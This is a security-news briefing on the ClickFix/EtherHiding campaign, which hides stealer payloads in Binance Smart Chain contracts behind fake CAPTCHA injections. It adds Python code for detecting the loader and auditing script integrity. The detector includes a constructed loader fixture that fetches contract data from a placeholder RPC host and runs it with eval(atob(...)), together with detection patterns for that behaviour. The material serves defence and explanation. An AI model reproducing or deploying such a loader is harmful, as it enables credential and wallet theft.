Briefing

A sophisticated, multi-stage attack dubbed ‘ClickFix’ is actively targeting Web3 users by compromising legitimate websites with malicious JavaScript injections. The primary consequence is the theft of user credentials and private keys via common stealers like AMOS and Vidar, leading directly to wallet draining. This campaign achieves high stealth and resilience by using the “EtherHiding” technique, which stores the final-stage malware payload across four separate smart contracts deployed on the Binance Smart Chain.


Context

The prevailing threat landscape has seen a critical increase in supply chain attacks, where threat actors compromise a trusted third-party service to inject malicious code into front-end interfaces. This technique abuses the inherent trust users place in legitimate websites and the absence of security controls that scan for malicious data hidden in on-chain state. The architecture bypasses conventional network-level security tools, which typically block known malware delivery domains but have no reason to block a public blockchain RPC endpoint.


Analysis

The attack chain initiates when a user visits a compromised website, triggering a malicious JavaScript injection that displays a fake CAPTCHA check, the ‘ClickFix’ lure. This script then executes the “EtherHiding” vector, querying a set of four smart contracts on the Binance Smart Chain to retrieve a Base64-encoded payload. A critical “gate contract” controls the delivery, allowing the threat actor to selectively enable or disable the attack by altering on-chain state.

This mechanism ultimately serves an OS-specific stealer that harvests credentials and private keys. The use of the immutable blockchain as a command-and-control server makes the payload highly resistant to takedown attempts.
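The loader pattern described above (hard-coded contract addresses, a JSON-RPC `eth_call` read, Base64 decoding, dynamic execution and a CAPTCHA lure string) can be scored statically when you review scripts served by your own site. The following Python is an added example, not code from the original briefing or from the campaign; the indicator weights, the threshold, the placeholder RPC URL and the all-1s/2s/3s/4s contract addresses in the fixtures are this example's own constructed values.

```python
import re
from dataclasses import dataclass, field

# Weighted static indicators of the EtherHiding/ClickFix loader pattern described
# in the briefing. Weights and threshold are this example's own choices.
INDICATORS = {
    # The loader reads contract state through JSON-RPC instead of contacting a C2 domain
    "json_rpc_eth_call": (re.compile(r'["\']eth_call["\']'), 3),
    # Hard-coded EVM contract addresses (the campaign uses four on BSC)
    "contract_address": (re.compile(r"\b0x[0-9a-fA-F]{40}\b"), 2),
    # Base64 decoding of the retrieved payload
    "base64_decode": (re.compile(r"\batob\s*\("), 1),
    # Dynamic execution of decoded content
    "dynamic_eval": (re.compile(r"\b(?:eval|Function)\s*\("), 2),
    # Fake CAPTCHA lure text shown to the visitor
    "captcha_lure": (re.compile(r"verify (?:you are|you're) (?:a )?human|not a robot", re.I), 2),
}
THRESHOLD = 6  # minimum combined weight before a script is reported


@dataclass
class ScanResult:
    score: int = 0
    hits: list = field(default_factory=list)
    contract_addresses: set = field(default_factory=set)

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def scan_script(source: str) -> ScanResult:
    """Score one script body against the indicator table."""
    result = ScanResult()
    for name, (pattern, weight) in INDICATORS.items():
        if pattern.search(source):
            result.hits.append(name)
            result.score += weight
    # Distinct addresses are reported separately: a cluster of several is itself a signal
    result.contract_addresses = {
        m.group(0).lower() for m in INDICATORS["contract_address"][0].finditer(source)
    }
    return result


# Constructed fixture resembling the loader the briefing describes. The RPC URL
# and addresses are placeholders and the script is deliberately non-functional.
SUSPICIOUS_SAMPLE = r"""
const rpc = "https://bsc-rpc.example/";
const gate  = "0x1111111111111111111111111111111111111111";
const parts = ["0x2222222222222222222222222222222222222222",
               "0x3333333333333333333333333333333333333333",
               "0x4444444444444444444444444444444444444444"];
function read(addr) {
  return fetch(rpc, {method: "POST", body: JSON.stringify(
    {jsonrpc: "2.0", method: "eth_call", params: [{to: addr}, "latest"], id: 1})});
}
document.body.insertAdjacentHTML("beforeend", "<p>Verify you are human to continue</p>");
read(gate).then(r => r.text()).then(b64 => eval(atob(b64)));
"""

# Constructed benign fixture: decodes an embedded config blob but touches no chain
BENIGN_SAMPLE = r"""
const cfg = JSON.parse(atob("eyJ0aGVtZSI6ICJkYXJrIn0="));
document.documentElement.dataset.theme = cfg.theme;
"""

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        r = scan_script(src)
        print(f"{label}: score={r.score} hits={r.hits} "
              f"addresses={len(r.contract_addresses)} flagged={r.suspicious}")
```

Run it against every script body your pages serve (inline and external) on a schedule; a single `atob(` on its own scores well under the threshold, so ordinary front-end code is not flagged, while the combination of a JSON-RPC read, several contract addresses and an `eval` of decoded data is. Treat a hit as a trigger to pull the script for manual review, not as proof by itself, and adjust the weights to your own codebase.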


Parameters

  • Attack Vector Obfuscation → Four smart contracts on BSC used for payload storage and delivery.
  • Infection Method → Malicious JavaScript injection on compromised legitimate websites.
  • Payload Stealers → AMOS and Vidar malware families.
  • Control Mechanism → On-chain state change via a “gate contract” to toggle the attack.


Outlook

Immediate mitigation requires all Web3 users to exercise extreme caution with any unexpected CAPTCHA or wallet-signing request, regardless of the host website’s apparent legitimacy. For protocols, this incident establishes a new security standard mandating continuous monitoring for third-party script integrity and the integration of on-chain forensic tools to identify malicious data storage patterns. The technique of using blockchain state for C2 infrastructure is a contagion risk that will likely be adopted by other sophisticated threat actors, necessitating a shift in defense from network-level to on-chain data analysis.
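The third-party script integrity monitoring the outlook calls for can be made concrete: record an out-of-band baseline of every external script a page loads, re-fetch them periodically, and alert on any script that is new, whose content has changed, or that ships without a Subresource Integrity attribute. The Python below is an added example, not the briefing's or any protocol's own tooling; the `cdn.example` URLs, the script bodies and the fake CDN lookup are constructed fixtures.

```python
import base64
import hashlib
from html.parser import HTMLParser


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Subresource Integrity value for a script body, e.g. 'sha384-<base64 digest>'."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


class _ScriptTags(HTMLParser):
    """Collects the attribute dict of every <script> that loads an external src."""
    def __init__(self) -> None:
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            if a.get("src"):
                self.scripts.append(a)


def external_scripts(html: str) -> list:
    p = _ScriptTags()
    p.feed(html)
    return p.scripts


def audit_page(html: str, fetch, baseline: dict) -> list:
    """Compare every external script on a page against an out-of-band baseline.

    fetch(url) returns the script bytes; baseline maps url -> expected SRI value.
    Returns (url, reason) alerts; an empty list means nothing changed.
    """
    alerts = []
    for attrs in external_scripts(html):
        url = attrs["src"]
        observed = sri_hash(fetch(url))
        if url not in baseline:
            alerts.append((url, "script not in baseline"))
        elif baseline[url] != observed:
            alerts.append((url, "script content changed since baseline"))
        declared = attrs.get("integrity")
        if declared is None:
            alerts.append((url, "no integrity attribute"))
        elif declared != observed:
            alerts.append((url, "integrity attribute does not match fetched content"))
    return alerts


# Constructed fixtures: a fake CDN and the page that loads from it.
VENDOR_JS = b"window.vendor = {ready: true};"
WIDGET_JS_ORIGINAL = b"window.widget = function () { return 'ok'; };"
WIDGET_JS_TAMPERED = WIDGET_JS_ORIGINAL + b"\n/* appended at the third party */"
INJECTED_JS = b"/* script that was never part of the build */"

FAKE_CDN = {
    "https://cdn.example/vendor.js": VENDOR_JS,
    "https://cdn.example/widget.js": WIDGET_JS_TAMPERED,   # changed since baseline
    "https://cdn.example/injected.js": INJECTED_JS,       # never baselined
}
BASELINE = {
    "https://cdn.example/vendor.js": sri_hash(VENDOR_JS),
    "https://cdn.example/widget.js": sri_hash(WIDGET_JS_ORIGINAL),
}
SAMPLE_HTML = f"""<html><head>
<script src="https://cdn.example/vendor.js" integrity="{sri_hash(VENDOR_JS)}" crossorigin="anonymous"></script>
<script src="https://cdn.example/widget.js"></script>
<script src="https://cdn.example/injected.js"></script>
</head><body></body></html>"""


def run_audit() -> list:
    """Audit the constructed page against the constructed baseline."""
    return audit_page(SAMPLE_HTML, FAKE_CDN.__getitem__, BASELINE)


if __name__ == "__main__":
    for url, reason in run_audit():
        print(f"ALERT {url}: {reason}")
```

Two controls work together here. The `integrity` attribute makes the browser refuse a third-party script whose bytes changed, which covers the case where only the CDN copy was tampered with. The out-of-band baseline covers the case this briefing describes, where the site itself is compromised and the attacker can also rewrite or drop the `integrity` attributes: a newly appearing script URL, or a hash that no longer matches what was recorded, is reported even when the served HTML looks self-consistent. Keep the baseline somewhere the web tier cannot write to, and re-baseline only through your deployment process.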


Verdict

This EtherHiding campaign represents a significant escalation in Web3 attack sophistication, demonstrating that threat actors are successfully leveraging the blockchain’s immutability as an undetectable command-and-control infrastructure.

supply chain attack, malicious javascript injection, on-chain payload delivery, smart contract obfuscation, credential stealer malware, private key theft, wallet draining scam, social engineering lure, Base64 encoded payload, Binance Smart Chain, gate contract logic, multi-stage infection, web3 security threat, front-end compromise, remote code execution, OS specific malware

Signal Acquired from → thehackernews.com

Micro Crypto News Feeds

wallet draining

Definition ∞ Wallet Draining is a malicious activity where an attacker illicitly transfers funds from a victim's digital wallet.

supply chain

Definition ∞ A supply chain is the network of all the individuals, companies, resources, activities, and technologies involved in the creation and sale of a product, from the delivery of source materials from the supplier to the manufacturer, through to its eventual sale to the end consumer.

smart chain

Definition ∞ A Smart Chain is a type of blockchain network specifically designed to support the execution of smart contracts and decentralized applications.

private keys

Definition ∞ Private keys are secret cryptographic codes that grant exclusive access and control over a user's digital assets on a blockchain.

javascript injection

Definition ∞ JavaScript Injection is a cyberattack where malicious JavaScript code is inserted into a website.

malware

Definition ∞ Malware is malicious software designed to infiltrate and damage computer systems or steal sensitive information.

contract

Definition ∞ A 'Contract' here is a smart contract: a set of rules and code deployed on a blockchain that automatically executes when predefined conditions are met.

on-chain

Definition ∞ On-chain refers to any transaction or data that is recorded and validated directly on a blockchain ledger, making it publicly verifiable and immutable.

web3

Definition ∞ Web3 represents the conceptual evolution of the internet, aiming for a decentralized architecture built upon blockchain technology and distributed ledger systems.